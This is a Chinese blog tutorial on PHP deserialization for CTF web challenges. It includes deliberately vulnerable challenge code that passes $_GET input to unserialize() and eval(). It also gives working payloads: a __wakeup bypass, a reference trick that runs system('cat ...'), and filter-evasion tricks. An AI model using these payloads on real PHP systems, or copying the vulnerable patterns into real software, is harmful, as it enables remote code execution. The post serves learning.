<h3 id="sleep-和-wakeup"><a href="#sleep-和-wakeup" class="headerlink" title="__sleep()和__wakeup()"></a>__sleep()和__wakeup()</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-comment">//__sleep()和__wakeup()</span><br> <br><span class="hljs-meta">&lt;?php</span><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">test</span></span><br><span class="hljs-class"></span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$a</span>=<span class="hljs-string">&quot;haha&quot;</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__sleep</span>(<span class="hljs-params"></span>)</span><br><span class="hljs-function">    </span>&#123;<br>        <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;使用了serialize()--&quot;</span>;<br>        <span class="hljs-keyword">return</span> <span class="hljs-keyword">array</span>(<span class="hljs-string">&quot;a&quot;</span>);<br>    &#125;<br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__wakeup</span>(<span class="hljs-params"></span>)</span><br><span class="hljs-function">    </span>&#123;<br>        <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;使用了unserialzie()&quot;</span>;<br>    &#125;<br>&#125;<br> <br><span class="hljs-variable">$a</span>=<span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">test</span>();<br><span class="hljs-variable">$b</span>=<span class="hljs-title function_ invoke__">serialize</span>(<span class="hljs-variable">$a</span>);<br><span class="hljs-variable">$c</span>=<span class="hljs-title function_ invoke__">unserialize</span>(<span class="hljs-variable">$b</span>);<br> <br><span class="hljs-meta">?&gt;</span><br> <br><span class="hljs-comment">//输出：</span><br>使用了<span class="hljs-title function_ invoke__">serialize</span>()--使用了<span class="hljs-title function_ invoke__">unserialzie</span>()<br> <br><span class="hljs-comment">//对象被序列化时触发了__sleep(),字符串被反序列化时触发了__wakeup()</span><br></code></pre></td></tr></table></figure>

<h3 id="toString-和-invoke"><a href="#toString-和-invoke" class="headerlink" title="__toString()和__invoke()"></a>__toString()和__invoke()</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-comment">//__toString()和__invoke()</span><br> <br><span class="hljs-meta">&lt;?php</span><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">test</span></span><br><span class="hljs-class"></span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$a</span>=<span class="hljs-string">&quot;haha&quot;</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__toString</span>(<span class="hljs-params"></span>)</span><br><span class="hljs-function">    </span>&#123;<br>        <span class="hljs-keyword">return</span> <span class="hljs-string">&quot;被当成字符串了--&quot;</span>;<br>    &#125;<br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__invoke</span>(<span class="hljs-params"></span>)</span><br><span class="hljs-function">    </span>&#123;<br>        <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;被当成函数了&quot;</span>;<br>    &#125;<br>&#125;<br> <br><span class="hljs-variable">$a</span>=<span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">test</span>();<br><span class="hljs-keyword">echo</span> <span class="hljs-variable">$a</span>;<br><span class="hljs-variable">$a</span>();<br> <br><span class="hljs-meta">?&gt;</span><br> <br><span class="hljs-comment">//输出：</span><br>被当成字符串了--ss被当成函数了<br> <br><span class="hljs-comment">//ehco $a 把对象当成字符串输出触发了__toString(),$a() 把对象当成</span><br><span class="hljs-comment">//函数执行触发了__invoke()</span><br></code></pre></td></tr></table></figure>

<h3 id="call（）和其他魔术方法"><a href="#call（）和其他魔术方法" class="headerlink" title="__call（）和其他魔术方法"></a>__call（）和其他魔术方法</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-comment">//__call（）和其他魔术方法</span><br> <br><span class="hljs-meta">&lt;?php</span><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">test</span></span><br><span class="hljs-class"></span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$h</span>=<span class="hljs-string">&quot;haha&quot;</span>;<br> <br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__call</span>(<span class="hljs-params"><span class="hljs-variable">$arg1</span>,<span class="hljs-variable">$arg2</span></span>)</span><br><span class="hljs-function">    </span>&#123;<br>        <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;你调用了不存在的方法&quot;</span>;<br>    &#125;<br>&#125;<br> <br><span class="hljs-variable">$a</span>=<span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">test</span>();<br><span class="hljs-variable">$a</span>-&gt;<span class="hljs-title function_ invoke__">h</span>();<br> <br><span class="hljs-meta">?&gt;</span><br> <br><span class="hljs-comment">//输出：</span><br>你调用了不存在的方法<br> <br><span class="hljs-comment">//$a-&gt;h()调用了不存在的方法触发了__call()方法，其他魔术方法类似不再演示</span><br></code></pre></td></tr></table></figure>

<h2 id="一些简单的php反序列化绕过方法"><a href="#一些简单的php反序列化绕过方法" class="headerlink" title="一些简单的php反序列化绕过方法"></a>一些简单的php反序列化绕过方法</h2><h3 id="wakeup-方法漏洞"><a href="#wakeup-方法漏洞" class="headerlink" title="__wakeup()方法漏洞"></a><font style="color:#000000;">__wakeup()方法漏洞</font></h3><p>存在此漏洞的php版本：php5-php5.6.25、php7-php7.0.10；</p>
<p>调用unserialize()方法时会先调用__wakeup()方法，但是当序列化字符串的表示成员属性的数字大于实际的对象的成员属性数量是时，__wakeup()方法不会被触发，以下的简单例题是__wakeup()方法漏洞的利用：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-comment">//__wakeup()方法绕过例题</span><br> <br> <span class="hljs-meta">&lt;?php</span><br> <br><span class="hljs-title function_ invoke__">header</span>(<span class="hljs-string">&quot;Content-type:text/html;charset=utf-8&quot;</span>);<br><span class="hljs-title function_ invoke__">error_reporting</span>(<span class="hljs-number">0</span>);<br><span class="hljs-title function_ invoke__">show_source</span>(<span class="hljs-string">&quot;class.php&quot;</span>);<br> <br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">HaHaHa</span></span>&#123;<br> <br> <br>        <span class="hljs-keyword">public</span> <span class="hljs-variable">$admin</span>;<br>        <span class="hljs-keyword">public</span> <span class="hljs-variable">$passwd</span>;<br> <br>        <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span>(<span class="hljs-params"></span>)</span>&#123;<br>            <span class="hljs-variable language_">$this</span>-&gt;admin =<span class="hljs-string">&quot;user&quot;</span>;<br>            <span class="hljs-variable language_">$this</span>-&gt;passwd = <span class="hljs-string">&quot;123456&quot;</span>;<br>        &#125;<br> <br>        <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__wakeup</span>(<span class="hljs-params"></span>)</span>&#123;<br>            <span class="hljs-variable language_">$this</span>-&gt;passwd = <span class="hljs-title function_ invoke__">sha1</span>(<span class="hljs-variable">$this</span>-&gt;passwd);<br>        &#125;<br> <br>        <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__destruct</span>(<span class="hljs-params"></span>)</span>&#123;<br>            <span class="hljs-keyword">if</span>(<span class="hljs-variable language_">$this</span>-&gt;admin === <span class="hljs-string">&quot;admin&quot;</span> &amp;&amp; <span class="hljs-variable language_">$this</span>-&gt;passwd === <span class="hljs-string">&quot;wllm&quot;</span>)&#123;<br>                <span class="hljs-keyword">include</span>(<span class="hljs-string">&quot;flag.php&quot;</span>);<br>                <span class="hljs-keyword">echo</span> <span class="hljs-variable">$flag</span>;<br>            &#125;<span class="hljs-keyword">else</span>&#123;<br>                <span class="hljs-keyword">echo</span> <span class="hljs-variable language_">$this</span>-&gt;passwd;<br>                <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;No wake up&quot;</span>;<br>            &#125;<br>        &#125;<br>    &#125;<br> <br><span class="hljs-variable">$Letmeseesee</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;p&#x27;</span>];<br><span class="hljs-title function_ invoke__">unserialize</span>(<span class="hljs-variable">$Letmeseesee</span>);<br> <br><span class="hljs-meta">?&gt;</span> NSSCTF&#123;f7b177f4-<span class="hljs-number">8e9</span>c-<span class="hljs-number">4154</span>-<span class="hljs-number">9134</span>-db0011b3b97a&#125;<br></code></pre></td></tr></table></figure>

<p>分析：</p>
<pre><code class="hljs">    只要满足__destruct()方法中的if条件就可以获得flag，构造payload时给对于属性赋值即可；

    然而，在反序列化调用unserialize()方法时会触发__wakeup方法，进而改变我们给$passwd属性的赋值，最终导致不满足if条件；

    因此需要避免__wakeup方法的触发，这就需要可以利用__wakeup()方法的漏洞，使序列化字符串的表示成员属性的数字大于实际的对象的成员属性数量，如下payload的构造：
</code></pre>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">HaHaHa</span></span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$admin</span>=<span class="hljs-string">&quot;admin&quot;</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$passwd</span>=<span class="hljs-string">&quot;wllm&quot;</span>;<br>&#125;<br> <br><span class="hljs-variable">$a</span>=<span class="hljs-keyword">new</span> <span class="hljs-title class_">HaHaHa</span>();<br> <br><span class="hljs-variable">$b</span>=<span class="hljs-title function_ invoke__">serialize</span>(<span class="hljs-variable">$a</span>);<br><span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;?p=&quot;</span>.<span class="hljs-variable">$b</span>;<br> <br><span class="hljs-meta">?&gt;</span><br> <br><span class="hljs-comment">//输出：</span><br>?p=O:<span class="hljs-number">6</span>:<span class="hljs-string">&quot;HaHaHa&quot;</span>:<span class="hljs-number">2</span>:&#123;s:<span class="hljs-number">5</span>:<span class="hljs-string">&quot;admin&quot;</span>;s:<span class="hljs-number">5</span>:<span class="hljs-string">&quot;admin&quot;</span>;s:<span class="hljs-number">6</span>:<span class="hljs-string">&quot;passwd&quot;</span>;s:<span class="hljs-number">4</span>:<span class="hljs-string">&quot;wllm&quot;</span>;&#125;<br> <br><span class="hljs-comment">//将成员属性数量2改为3，大于实际值2即可，payload如下：</span><br>?p=O:<span class="hljs-number">6</span>:<span class="hljs-string">&quot;HaHaHa&quot;</span>:<span class="hljs-number">3</span>:&#123;s:<span class="hljs-number">5</span>:<span class="hljs-string">&quot;admin&quot;</span>;s:<span class="hljs-number">5</span>:<span class="hljs-string">&quot;admin&quot;</span>;s:<span class="hljs-number">6</span>:<span class="hljs-string">&quot;passwd&quot;</span>;s:<span class="hljs-number">4</span>:<span class="hljs-string">&quot;wllm&quot;</span>;&#125;<br></code></pre></td></tr></table></figure>

<h3 id="引用"><a href="#引用" class="headerlink" title="引用"></a><font style="color:#000000;">引用</font></h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-comment">//简单例题</span><br> <br><span class="hljs-meta">&lt;?php</span><br> <br><span class="hljs-title function_ invoke__">show_source</span>(<span class="hljs-keyword">__FILE__</span>);<br> <br><span class="hljs-comment">###very___so___easy!!!!</span><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">test</span></span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$a</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$b</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$c</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span>(<span class="hljs-params"></span>)</span>&#123;<br>        <span class="hljs-variable language_">$this</span>-&gt;a=<span class="hljs-number">1</span>;<br>        <span class="hljs-variable language_">$this</span>-&gt;b=<span class="hljs-number">2</span>;<br>        <span class="hljs-variable language_">$this</span>-&gt;c=<span class="hljs-number">3</span>;<br>    &#125;<br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__wakeup</span>(<span class="hljs-params"></span>)</span>&#123;<br>        <span class="hljs-variable language_">$this</span>-&gt;a=<span class="hljs-string">&#x27;&#x27;</span>;<br>    &#125;<br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__destruct</span>(<span class="hljs-params"></span>)</span>&#123;<br>        <span class="hljs-variable language_">$this</span>-&gt;b=<span class="hljs-variable language_">$this</span>-&gt;c;<br>        <span class="hljs-keyword">eval</span>(<span class="hljs-variable language_">$this</span>-&gt;a);<br>    &#125;<br>&#125;<br><span class="hljs-variable">$a</span>=<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;a&#x27;</span>];<br><span class="hljs-keyword">if</span>(!<span class="hljs-title function_ invoke__">preg_match</span>(<span class="hljs-string">&#x27;/test&quot;:3/i&#x27;</span>,<span class="hljs-variable">$a</span>))&#123;<br>    <span class="hljs-keyword">die</span>(<span class="hljs-string">&quot;你输入的不正确！！！搞什么！！&quot;</span>);<br>&#125;<br><span class="hljs-variable">$bbb</span>=<span class="hljs-title function_ invoke__">unserialize</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;a&#x27;</span>]);<br>NSSCTF&#123;This_iS_SO_SO_SO_EASY&#125; <br></code></pre></td></tr></table></figure>

<p>分析</p>
<pre><code class="hljs">    魔术方法___wakeup()会使变量a为空，且由于正则限制无法通过改变成员数量绕过__wakeup()，这时可以使用引用的方法，使变量a与变量b永远相等，魔术方法__destruct()把变量c值赋给变量b时，相当于给变量a赋值，这就可以完成命令执行，payload如下：
</code></pre>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">test</span></span><br><span class="hljs-class"></span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$a</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$b</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$c</span>=<span class="hljs-string">&#x27;system(&quot;cat /fffffffffflagafag&quot;);&#x27;</span>;<br> <br>&#125;<br><span class="hljs-variable">$h</span> = <span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">test</span>();<br><span class="hljs-variable">$h</span>-&gt;b = &amp;<span class="hljs-variable">$h</span>-&gt;a;   <span class="hljs-comment">//注意：取会改变的属性的地址，如取a的地址赋值给b，当给a赋值时a会等于b的值</span><br><span class="hljs-keyword">echo</span> <span class="hljs-string">&#x27;?a=&#x27;</span>.<span class="hljs-title function_ invoke__">serialize</span>(<span class="hljs-variable">$h</span>);<br> <br><span class="hljs-comment">//输出</span><br><span class="hljs-comment">//?a=O:4:&quot;test&quot;:3:&#123;s:1:&quot;a&quot;;N;s:1:&quot;b&quot;;R:2;s:1:&quot;c&quot;;s:33:&quot;system(&quot;cat /fffffffffflagafag&quot;);&quot;;&#125;</span><br></code></pre></td></tr></table></figure>

<h3 id="对类属性不敏感"><a href="#对类属性不敏感" class="headerlink" title="对类属性不敏感"></a><font style="color:rgb(79, 79, 79);">对类属性不敏感</font></h3><p><font style="color:rgb(77, 77, 77);">protected和private属性的属性名与public属性的属性名不同，由于对属性不敏感，即使不加%00* %00和%00类名%00也可以被正确解析；</font></p>
<h3 id="大写S当十六进制绕过"><a href="#大写S当十六进制绕过" class="headerlink" title="大写S当十六进制绕过"></a><font style="color:#000000;">大写S当十六进制绕过</font></h3><p><font style="color:rgb(77, 77, 77);">表示字符串类型的s大写为S时，其对应的值会被当作十六进制解析；</font></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs php">例如   s:<span class="hljs-number">13</span>:<span class="hljs-string">&quot;SplFileObject&quot;</span>  中的Object被过滤<br> <br>可改为  S:<span class="hljs-number">13</span>:<span class="hljs-string">&quot;SplFileOb\6aect&quot;</span><br> <br>小写s变大写S，长度<span class="hljs-number">13</span>不变，\<span class="hljs-number">6</span>a是字符j的十六进制编码<br></code></pre></td></tr></table></figure>

<h3 id="php类名不区分大小写"><a href="#php类名不区分大小写" class="headerlink" title="php类名不区分大小写"></a><font style="color:#000000;">php类名不区分大小写</font></h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs php">O:<span class="hljs-number">1</span>:<span class="hljs-string">&quot;A&quot;</span>:<span class="hljs-number">2</span>:&#123;s:<span class="hljs-number">1</span>:<span class="hljs-string">&quot;c&quot;</span>;s:<span class="hljs-number">2</span>:<span class="hljs-string">&quot;11&quot;</span>;s:<span class="hljs-number">1</span>:<span class="hljs-string">&quot;b&quot;</span>;s:<span class="hljs-number">2</span>:<span class="hljs-string">&quot;22&quot;</span>;&#125;<br> <br>等效于<br> <br>O:<span class="hljs-number">1</span>:<span class="hljs-string">&quot;a&quot;</span>:<span class="hljs-number">2</span>:&#123;s:<span class="hljs-number">1</span>:<span class="hljs-string">&quot;c&quot;</span>;s:<span class="hljs-number">2</span>:<span class="hljs-string">&quot;11&quot;</span>;s:<span class="hljs-number">1</span>:<span class="hljs-string">&quot;b&quot;</span>;s:<span class="hljs-number">2</span>:<span class="hljs-string">&quot;22&quot;</span>;&#125;<br></code></pre></td></tr></table></figure>


                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/CTF/" class="category-chain-item">CTF</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/BaseCTF-WEB%E6%96%B9%E5%90%91/" class="print-no-link">#BaseCTF(WEB方向)</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>PHP反序列化</div>
      <div>http://example.com/2024/12/19/PHP反序列化/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>big_freeze_mouse</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2024年12月19日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2024/12/19/SQL%E6%B3%A8%E5%85%A5%E9%A2%98%E7%9B%AEWP/" title="SQL注入题目WP">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">SQL注入题目WP</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2024/12/19/NewStar2024-SQL%E6%B3%A8%E5%85%A5%E9%A2%98%E7%9B%AE/" title="NewStar2024(SQL注入题目)">
                        <span class="hidden-mobile">NewStar2024(SQL注入题目)</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>

  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
